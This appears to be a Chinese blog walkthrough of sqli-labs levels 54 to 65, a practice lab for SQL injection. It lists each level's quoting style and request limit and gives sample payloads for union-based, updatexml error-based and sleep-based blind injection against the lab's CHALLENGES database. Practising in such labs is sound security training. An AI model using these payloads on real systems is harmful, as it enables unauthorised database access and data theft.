zoukankan      html  css  js  c++  java
  • sqli-libs(54-65关)

    Less_54

    Less-54:使用’’包裹

    对输入的次数做了限制,必须在10次请求之内获取信息,否则会刷新表名

     

     

     输入:?Id=1order by 3--+   查看有多少列;

     

     输入 ?id=-1' union select 1,2,3 --+ 查看回显位置;

     

     输入  ?id=-1'union select 1,2, group_concat(table_name)from information_schema.tables where table_schema='CHALLENGES' --+  查看表名;

     

     下面操作和less1基本一致。

    Less_55

    Less55: 使用()包裹 

      对输入的次数做了限制,必须在14次请求之内获取信息,否则会刷新表名

    其他操作与第54基本一致

     

     

     

    Less_56

    Less56:使用('’)包裹  

    对输入的次数做了限制,必须在14次请求之内获取信息,否则会刷新表名

    其他操作与第54基本一致

     

     

     

    Less_57

    Less57:使用””包裹

    对输入的次数做了限制,必须在14次请求之内获取信息,否则会刷新表名

    其他操作与第54基本一致

     

     

     

    Less_58

    Less58:使用’’包裹  

    对输入的次数做了限制,必须在5次请求之内获取信息,否则会刷新表名

     

     

     

    输入 ?id=-1' union select 1,2,3 --+   并没有显示回显的位置

     

     

    所以我们不能使用union select联合查询,我们使用报错注入;

     输入 ?id=-1'andupdatexml(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema='CHALLENGES')),1) --+  查表名;

     

    接下来步骤与less1基本一致。

     

     

     

    Less_59

     

    Less59:无包裹  

    对输入的次数做了限制,必须在5次请求之内获取信息,否则会刷新表名

     

     

    输入?id=-1 union select 1,2,3 --+  依旧没有回显位置;

     

     所以同58关相同,使用报错注入。

    Less_60

    Less60使用(“”)包裹  

    对输入的次数做了限制,必须在5次请求之内获取信息,否则会刷新表名

    采用报错注入与58关基本一致

     

     

    Less_61

    Less61使用((‘’))包裹

    对输入的次数做了限制,必须在5次请求之内获取信息,否则会刷新表名

     采用报错注入与58关基本一致

     

     

    Less_62

    Less62使用(‘’)包裹 

    对输入的次数做了限制,必须在130次请求之内获取信息,否则会刷新表名

    使用时间盲注

     

     

     输入 ?id=1') and if((length(database())=1),1,sleep(5))--+  判断数据库的长度;

     

     输入 ?id=1') and if( left( (select table_name from information_schema.tables where table_schema='CHALLENGES' limit 0,1),1)> 's' ,1, sleep(5)) --+  判断数据库字母是否比s大;

     

     

    less_63

    Less63使用‘’包裹 

    对输入的次数做了限制,必须在130次请求之内获取信息,否则会刷新表名

    使用时间盲注其他操作与第62关基本一致。

     

     

    less_64

    Less64使用(())包裹 

    对输入的次数做了限制,必须在130次请求之内获取信息,否则会刷新表名

    使用时间盲注其他操作与第62关基本一致。

     

     

     

    Less_65

    Less65使用(“”)包裹 

    对输入的次数做了限制,必须在130次请求之内获取信息,否则会刷新表名

    使用时间盲注其他操作与第62关基本一致。

     

     

     

  • 相关阅读:
    Nginx服务器环境搭建
    PostgreSQL常见问题处理方法
    Linux之awk使用
    PostgreSQL常用SQL
    用apache commons-pool2建立thrift连接池
    redis开发小结
    如何解决netty发送消息截断问题
    后端服务开发总结
    利用git reflog找回错误的重置
    TCP长链接调试利器nc
  • 原文地址:https://www.cnblogs.com/199904-04/p/12296675.html
Copyright © 2011-2022 走看看